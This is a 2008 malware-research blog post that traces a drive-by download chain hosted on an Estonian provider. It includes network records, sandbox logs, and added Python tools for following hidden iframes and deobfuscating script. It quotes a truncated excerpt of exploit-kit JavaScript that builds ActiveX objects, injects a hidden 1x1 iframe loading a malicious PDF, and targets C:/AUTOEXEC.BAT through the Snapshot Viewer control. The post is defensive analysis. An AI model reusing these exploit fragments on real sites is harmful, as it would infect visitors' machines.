Posted by: realsecurity | December 17, 2008

Sources of Badness – Starline Web Services

Next up, we have Starline Web Services, based in Estonia. Starline was recently in the news for briefly hosting a Srizbi C&C, as reported by FireEye.

inetnum: -
netname:        STARLINE_EE
descr:          Starline Web Services
country:        EE
admin-c:        VN268-RIPE
tech-c:         VN268-RIPE
status:         ASSIGNED PA
mnt-by:         AS39823-MNT
changed: 20080403
source:         RIPE

The Yahoo article has lots of great information on the relationship between Starline and its upstream providers, so I won’t delve into that here.

Here are the hits I’ve seen from their IP space:

2008-11-05 /load.php
2008-11-12 /cache/doc.pdf
2008-11-22 /cache/doc.pdf
2008-10-24 /zpl/pdf.php
2008-10-30 /eez3a893/spl/pdf.pdf
2008-11-26 /u8899r5v/spl/pdf.pdf
2008-12-17 /yg6cv7ar/spl/pdf.pdf
2008-09-18 /1/
2008-09-17 /1/

There’s quite a history here. From the looks of things, someone has been moving their malware from domain to domain on All of these sites are down as of this writing except Let’s dive further into this site.

The first page I saw was /yg6cv7ar/spl/pdf.pdf, but that is not the whole story. When I went back to that exact URL, pdf.pdf was not found. This is curious, as I had seen the site earlier the same day. Backing up to the root of, we get an index page. The index page contains an iframe that points to a different directory. The malware author must have coded the site to rotate directory names based on some criterion. This makes investigation difficult if you can’t figure out where it will send victims next.
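Because the directory name rotates, the reliable way back in is to start at the root index and follow the iframe chain rather than revisiting the path you saw last. The script below is an added example written for this page, not code from the original post; the site contents it walks are constructed stand-ins (the only paths taken from the post are /yg6cv7ar/spl/pdf.pdf and spl/pdf.pdf; the rotated directory name and the host example.invalid are placeholders). It resolves each relative src against the page it was found on, records which frames are sized or styled to be invisible, and stops when a hop returns non-HTML content or an error.

```python
"""Follow a chain of hidden iframes from a site's root index, offline.

Added example, not code from the original post. SITE is a constructed
stand-in for the live server: the root index points at a directory whose
name rotates, so the path observed earlier no longer answers.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed site map: URL path -> (status, body). "rotated-dir-example"
# and the PDF placeholder body are invented for the example.
SITE = {
    "/": (200, '<html><body><h1>nothing here</h1>'
               '<iframe src="rotated-dir-example/index.php" width=1 height=1 '
               'style="display:none"></iframe></body></html>'),
    "/rotated-dir-example/index.php": (200,
        '<html><body><script>/* obfuscated loader */</script>'
        '<iframe src="spl/pdf.pdf" width=1 height=1 style="display:none"></iframe>'
        '</body></html>'),
    "/rotated-dir-example/spl/pdf.pdf": (200, "%PDF-1.4 (constructed placeholder)"),
    # The path seen earlier in the day is gone: the directory has rotated.
    "/yg6cv7ar/spl/pdf.pdf": (404, "Not Found"),
}


def fetch(url):
    """Stand-in for an HTTP GET, answered from the constructed SITE map."""
    path = urlparse(url).path or "/"
    return SITE.get(path, (404, "Not Found"))


class IframeExtractor(HTMLParser):
    """Collect iframe targets and note which ones are meant to be invisible."""

    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src = a.get("src")
        if not src:
            return
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = ("display:none" in style
                  or a.get("width") in ("0", "1")
                  or a.get("height") in ("0", "1"))
        self.frames.append((src, hidden))


def extract_iframes(html):
    """Return [(src, hidden)] for every iframe in the document."""
    p = IframeExtractor()
    p.feed(html)
    return p.frames


def follow_iframes(start_url, fetch_fn=fetch, max_depth=5):
    """Walk the first iframe on each page, starting at start_url.

    Returns [(url, status, hidden)] for each hop. Stops on a non-200
    response, on a page with no iframe (e.g. the PDF itself), or at max_depth.
    """
    chain = []
    url, hidden = start_url, False
    for _ in range(max_depth):
        status, body = fetch_fn(url)
        chain.append((url, status, hidden))
        if status != 200:
            break
        frames = extract_iframes(body)
        if not frames:
            break
        src, hidden = frames[0]
        url = urljoin(url, src)  # relative src resolves against the current page
    return chain


if __name__ == "__main__":
    for hop in follow_iframes("http://example.invalid/"):
        print(hop)
    print("direct revisit:", fetch("http://example.invalid/yg6cv7ar/spl/pdf.pdf")[0])
```

The direct revisit returns 404 while the walk from the root lands on the currently served directory, which is the behaviour described above. Against a live site you would swap `fetch` for a real client and, if the rotation turns out to be per-visitor, run the walk several times and diff the directory names.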

The next iframe I got contained:


The next page that comes into play is the exploit script index.php, which is detected as:


Decoding the obfuscation reveals exploits for MDAC, Adobe Acrobat and the Microsoft Access Snapshot Viewer. Here’s some of the script:

var p_url = "";
function MDAC(){
    var nuc = '';
    d8 = 0;
    // "object" is assembled from fragments joined by an empty string
    var koSZV = document.createElement("o"+nuc+"b"+nuc+"je"+nuc+"c"+nuc+"t");
    // ... (remainder of the function elided in the excerpt)
}
function PDF(){
    // hidden 1x1 iframe pulls in the malicious PDF
    document.write('<iframe src="spl/pdf.pdf" width=1 height=1 style="display:none"></iframe>');
}
function SS(){
    var arbitrary_file = p_url;
    var dest = 'C:/AUTOEXEC.BAT';
    // Snapshot Viewer ActiveX control instantiated by CLSID
    document.write("<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'></object>");
    // ... (remainder of the function elided in the excerpt)
}
if (MDAC()||PDF()||SS()) { }
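A small deobfuscator for the string-splitting trick above, written as an added example for this page; it is neither the kit’s code nor tooling from the original post. It generalizes the `"o"+nuc+"b"` pattern: any variable initialized to an empty string is stripped out of concatenations, adjacent literals are merged, and the result is scanned for the indicators the post describes (an ActiveX object created via createElement, a classid CLSID, a hidden iframe pulling a PDF, and the file-write target). SAMPLE reproduces the excerpt above with straight quotes and braces restored; the CLSID label relies on the post’s identification of SS() as the Snapshot Viewer exploit.

```python
"""Collapse split-string obfuscation and flag exploit indicators.

Added example for this page, not the exploit kit's code or the post's own
tooling. SAMPLE reproduces the script excerpt quoted above with
quotes/braces restored; the analysis logic is this example's own.
"""
import re

SAMPLE = r'''
var p_url = "";
function MDAC(){
var nuc='';
d8= 0;
var koSZV = document.createElement("o"+nuc+"b"+nuc+"je"+nuc+"c"+nuc+"t");
}
function PDF(){
document.write('<iframe src="spl/pdf.pdf" width=1 height=1 style="display:none"></iframe>');
}
function SS(){
var arbitrary_file = p_url;
var dest = 'C:/AUTOEXEC.BAT';
document.write("<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'></object>");
}
if (MDAC()||PDF()||SS()) { }
'''

# CLSID named in the excerpt; the post identifies SS() as the Snapshot Viewer exploit.
KNOWN_CLSIDS = {
    "F0E42D60-368C-11D0-AD81-00A0C90DC8D9": "Microsoft Access Snapshot Viewer control",
}

_EMPTY_VAR = re.compile(r"""var\s+(\w+)\s*=\s*(?:''|"")\s*;""")
_DQ_PAIR = re.compile(r'"([^"\n]*)"\s*\+\s*"([^"\n]*)"')
_SQ_PAIR = re.compile(r"'([^'\n]*)'\s*\+\s*'([^'\n]*)'")
_CLSID = re.compile(r"clsid:([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})")


def collapse_split_strings(js):
    """Resolve "a"+EMPTY+"b" style concatenations into one literal.

    Handles any variable assigned '' or "" anywhere in the script, not only
    the name used in SAMPLE, and merges adjacent literals until stable.
    """
    for name in _EMPTY_VAR.findall(js):
        # "o"+nuc+"b"  ->  "o"+"b"
        js = re.sub(r"\s*\+\s*\b" + re.escape(name) + r"\b\s*\+\s*", "+", js)
    while True:
        merged = _DQ_PAIR.sub(r'"\1\2"', js)
        merged = _SQ_PAIR.sub(r"'\1\2'", merged)
        if merged == js:
            return js
        js = merged


def analyze(js):
    """Return the indicators found after deobfuscation."""
    js = collapse_split_strings(js)
    return {
        # ActiveX instantiation through the DOM rather than a literal <object> tag
        "activex_create": bool(re.search(r"""createElement\(\s*["']object["']\s*\)""", js)),
        # Every CLSID referenced, labelled where the post tells us what it is
        "clsids": {c.upper(): KNOWN_CLSIDS.get(c.upper(), "unknown control")
                   for c in _CLSID.findall(js)},
        # Invisible iframes and what they load
        "hidden_iframes": re.findall(r"""<iframe[^>]*src=["']([^"']+)["'][^>]*display:\s*none""", js),
        # Local path the Snapshot Viewer stage writes to
        "file_targets": re.findall(r"""\bdest\s*=\s*["']([^"']+)["']""", js),
        "deobfuscated": js,
    }


if __name__ == "__main__":
    result = analyze(SAMPLE)
    for key in ("activex_create", "clsids", "hidden_iframes", "file_targets"):
        print(key, "=", result[key])
```

Running it on the excerpt reports the createElement("object") call, the Snapshot Viewer CLSID, the hidden spl/pdf.pdf iframe and the C:/AUTOEXEC.BAT write target, which is everything a signature writer needs from this stage without executing it. The merge step is deliberately regex-based and literal-only; it does not evaluate JavaScript, so a kit that builds strings with fromCharCode or arithmetic needs a real interpreter instead.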

Detections for the malicious pdf:


The payload is a file called ztt.php, here are a few of the detections:


A quick submission to Threat Expert (report) and Anubis (report) reveals further binaries that are downloaded. The .dat files are not executables but some kind of binary data file.

From ANUBIS:1033 to – []
Request: GET /flo/zro.dat
Response: 200 “OK”
Request: GET /flo/mp.dat
Response: 200 “OK”
Request: GET /flo/3rkour.dat
Response: 200 “OK”

Of particular interest is, another Latvian host with a small /24 network. Might be worth keeping your eyes open for them too.

inetnum: -
netname:        VDHOST
descr:          VDHost network
org:            ORG-Vs27-RIPE
country:        LV
admin-c:        CINA1-RIPE
tech-c:         CINA1-RIPE
status:         ASSIGNED PA
mnt-by:         IT9812-MNT

From ANUBIS:1036 to – []
Request: GET /myfiles/95/139/file.exe
Response: 200 “OK”
From ANUBIS:1037 to – []
Request: GET /files/20026.exe
Response: 200 “OK”
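The two Anubis listings above are easy to read by hand, but when a sandbox report runs to dozens of fetches it helps to pull the requests out programmatically and, because the extension tells you nothing, check each downloaded body for a real PE header rather than trusting ".dat" versus ".exe". The code below is an added example for this page, not part of the post or the sandbox's output format beyond the three line types visible above. ANUBIS_LOG is a constructed excerpt in that shape (the host column is blank in the post, so only source port and path survive), and BODIES holds constructed stand-ins for the downloaded files: only their magic bytes matter, and no real sample content is reproduced.

```python
"""Parse an Anubis-style request listing and check downloads for PE headers.

Added example for this page. The log text and file bodies are constructed;
the paths are the ones quoted in the post, the contents are not.
"""
import re
import struct

ANUBIS_LOG = """\
From ANUBIS:1033 to - []
Request: GET /flo/zro.dat
Response: 200 "OK"
Request: GET /flo/mp.dat
Response: 200 "OK"
Request: GET /flo/3rkour.dat
Response: 200 "OK"
From ANUBIS:1036 to - []
Request: GET /myfiles/95/139/file.exe
Response: 200 "OK"
From ANUBIS:1037 to - []
Request: GET /files/20026.exe
Response: 200 "OK"
"""


def parse_anubis(log):
    """Return [(source_port, path, status)] for each request/response pair."""
    out, port, pending = [], None, None
    for line in log.splitlines():
        m = re.match(r"From ANUBIS:(\d+) to", line)
        if m:
            port = int(m.group(1))   # one connection, possibly several requests
            continue
        m = re.match(r"Request:\s+GET\s+(\S+)", line)
        if m:
            pending = m.group(1)
            continue
        m = re.match(r"Response:\s+(\d{3})", line)
        if m and pending is not None:
            out.append((port, pending, int(m.group(1))))
            pending = None
    return out


def fake_pe():
    """Constructed minimal PE: DOS header whose e_lfanew points at 'PE\\0\\0'."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)   # e_lfanew = offset of the PE signature
    return bytes(dos) + b"PE\0\0" + b"\0" * 20


# Constructed stand-ins for the downloaded bodies (magic bytes only).
BODIES = {
    "/flo/zro.dat": b"\x8c\x12\x7f\x00" + bytes(range(32)),   # opaque data blob
    "/flo/mp.dat": b"\x00\x01\x02" * 10,
    "/flo/3rkour.dat": b"\x9d\x37" * 16,
    "/myfiles/95/139/file.exe": fake_pe(),
    "/files/20026.exe": fake_pe(),
}


def is_pe(data):
    """True if data has an MZ header whose e_lfanew lands on a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def classify_downloads(log, bodies):
    """Pair each successfully fetched path with its extension and PE-ness."""
    return [(path, path.rsplit(".", 1)[-1], is_pe(bodies.get(path, b"")))
            for _, path, status in parse_anubis(log) if status == 200]


if __name__ == "__main__":
    for path, ext, pe in classify_downloads(ANUBIS_LOG, BODIES):
        print(f"{path:28} .{ext:4} PE={pe}")
```

With the constructed bodies the three .dat fetches come back as non-PE and the two .exe fetches as PE, matching the post’s observation; the point of the check is that it would also catch the reverse case, a PE served under a .dat or .jpg name, which the extension alone never will.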

Some detections for 20026.exe and file.exe:



The FakeAlert signatures are correct; the threat ultimately installs a fake anti-virus / anti-spyware application.




  1. Just had these guys try to access my home PC; Norton did its job. Is there anything else I need to be wary of?

  2. Yeah, your antivirus is not catching all the malware.
